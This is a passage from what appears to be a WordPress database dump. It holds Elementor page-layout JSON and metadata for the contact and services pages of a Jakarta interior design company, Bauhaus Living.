industri.<\\/p><p>\\u00a0<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Let\'s turn your ideas\\ninto reality\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or WhatsApp: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"0822 9777 5589\",\"phone_address\":\"082297775589\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":400},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Commercial\",\"number\":100,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Residential\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Office\",\"number\":100,\"icon\":{\"value\":\"flaticon flaticon-building\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(4126,4907,'_elementor_page_assets','a:1:{s:6:\"styles\";a:2:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";}}'),(4127,4907,'_elementor_pro_version','3.8.1'),(4128,4907,'_elementor_css','a:6:{s:4:\"time\";i:1695376247;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:8:\"fa-solid\";i:3;s:0:\"\";i:5;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4129,38,'_elementor_css','a:6:{s:4:\"time\";i:1695376358;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:8:\"fa-solid\";i:3;s:0:\"\";i:5;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4130,4908,'_wp_page_template','elementor_header_footer'),(4131,4908,'_elementor_edit_mode','builder'),(4132,4908,'_elementor_template_type','wp-page'),(4133,4908,'_elementor_version','3.8.1'),(4134,4908,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!\",\"description\":\"Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.\\n\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"021 22544768\",\"phone_address\":\"+021 22544768\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"info@bauhausliving.com\",\"email_address\":\"info@bauhausliving.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":false,\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false},{\"id\":\"3e7e3bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":42,\"_inline_size_tablet\":100,\"align\":\"center\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg.png\",\"id\":800,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"top right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9fb7201\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"logo_opacity_desktop\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"logo_opacity_mobile\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"ova_logo\"},{\"id\":\"62a6664\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us \",\"title\":\"Write anytime\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"color_title\":\"#FFFFFF\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"21ccb5c\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"44\",\"left\":\"0\",\"isLinked\":false},\"_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_color\":\"#3A3A3A\",\"shortcode\":\"[contact-form-7 id=\\\"884\\\" title=\\\"Contact page\\\"]\",\"_css_classes\":\"ova-contact-page\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0ec9a68\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\"},\"elements\":[{\"id\":\"fc5198b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080f03e\",\"elType\":\"widget\",\"settings\":{\"address\":\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"height\":{\"unit\":\"px\",\"size\":475,\"sizes\":[]},\"height_tablet\":{\"unit\":\"px\",\"size\":350,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":107,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"zoom\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"hover_transition\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false}]'),(4135,4908,'_elementor_page_assets','a:0:{}'),(4136,4908,'_elementor_pro_version','3.8.1'),(4137,4909,'_wp_page_template','elementor_header_footer'),(4138,4909,'_elementor_edit_mode','builder'),(4139,4909,'_elementor_template_type','wp-page'),(4140,4909,'_elementor_version','3.8.1'),(4141,4909,'_elementor_data','[{\"id\":\"cf0a9af\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-60\",\"left\":0,\"isLinked\":false},\"z_index\":5},\"elements\":[{\"id\":\"11277b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":57.332,\"_inline_size_tablet\":100,\"_inline_size_mobile\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"80\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"25d4298\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"contact us\",\"title\":\"Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!\",\"description\":\"Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.\\n\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"2fd982e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"label\":\"Have any question?\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"021 22544768\",\"phone_address\":\"+021 22544768\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"849b928\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-letter\",\"library\":\"ovaicon\"},\"label\":\"Write email\",\"items_info\":[{\"email_label\":\"info@bauhausliving.com\",\"email_address\":\"info@bauhausliving.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\"}],\"icon_fontsize\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_color\":\"#E3B25A\",\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"icon_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"23\",\"bottom\":\"23\",\"left\":\"23\",\"isLinked\":true},\"border_icon_border\":\"solid\",\"border_icon_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"500\",\"label_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"info_color\":\"#242424\",\"info_color_hover\":\"#E3B25A\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"inherit\",\"_element_vertical_align\":\"center\",\"show_dot_corner\":\"yes\",\"icon_dot_corner\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"icon_color_hover\":\"#FFFFFF\",\"dot_corner_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"9baa065\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"ovaicon ovaicon-pin\",\"library\":\"ovaicon\"},\"label\":\"Visit anytime \",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"8d67786\",\"phone_label\":\"Frre +23 (000)-9850\",\"phone_address\":\"+230009850\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, 